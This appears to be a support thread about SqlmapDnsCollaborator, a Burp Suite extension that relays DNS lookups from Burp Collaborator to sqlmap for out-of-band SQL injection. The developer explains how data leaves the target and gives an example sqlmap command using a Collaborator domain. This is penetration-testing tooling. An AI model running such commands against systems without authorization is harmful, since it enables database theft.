Sample evidence

[Hipapheralkus]

Could you please put a short video or GIF on how it is supposed to work? Because how will SQLmap know to use some Collaborator strings? I mean it is a separate process, and if I don't route SQLmap traffic through Burp suite, how will SqlmapDnsCollaborator know what/how to do? I guess I have hard time believing something works so well and easy out of the box with no setup :-D Or describe the process on the background how it works with a little but more details. Thanks:)

[lucacapacci]

Hi Andrej,

I'll try to elaborate what happens under the hood. I'll start from the second part of the README.md.

1. You open Burp on your computer and enable SqlmapDnsCollaborator. What happens when you enable SqlmapDnsCollaborator: the extension obtains from Burp servers a Collaborator hostname (aka something like somerandomstring.burpcollaborator.net) and starts polling that specific Burp Collaborator hostname every 500ms, in order to check if the Collaborator received something from somewhere. If the Collaborator received a DNS request, the extension replicates the same exact DNS request to port 53 of localhost.

2. You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target. As shown in the extension output, you need to run sqlmap with the --dns-domain parameter, setting it with the Collaborator hostname obtained in step 1. In this example it would be like this: sqlmap.py -u "https://yourvulnerabletarget.com" --dns-domain=somerandomstring.burpcollaborator.net This way, 2 things will happen:

• sqlmap is going to start listening for DNS requests on port 53 of localhost
• at some point, the vulnerable target will start sending DNS requests to subdomains of somerandomstring.burpcollaborator.net

3. Vulnerable target sends DNS requests to Burp Collaborator containing interesting data. Nothing to say here, I already explained in step 2.

4. SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap. As described in step 1, the extension every 500ms detects if the Collaborator received DNS requests and forwards them to port 53 of localhost - which is where Sqlmap is listening.

5. DNS requests are interpreted by Sqlmap. Sqlmap receives a DNS request from the extension, which is a replica of what the vulnerable target sent to the Collaborator. And Sqlmap does what it has to do with the DNS request.

If you have any further question, I'm more than happy to answer.

Cheers

[Hipapheralkus]

now I'm seeing what I've missed. It was the Extension Output in Extender tab. I was searching for new tab; or new menu; or some documentation explaining how to tie it together but I've missed the --dns-domain=somerandomstring.burpcollaborator.net entirely. Thanks for help, maybe you could put this information to the official description for other people as well:) Great extension, I'm going to try it right away!

[malpais]

I am receiving connection timed out, however I am running sqlmap from another machine. The queries are showing up fine in the Extender UI output, but it is showing as failing on sqlmap due to time out. Does it need to be ran from the same machine as Burp Pro?

[lucacapacci]

Hi Malpais, Sqlmap needs to run on the same machine of Burp Pro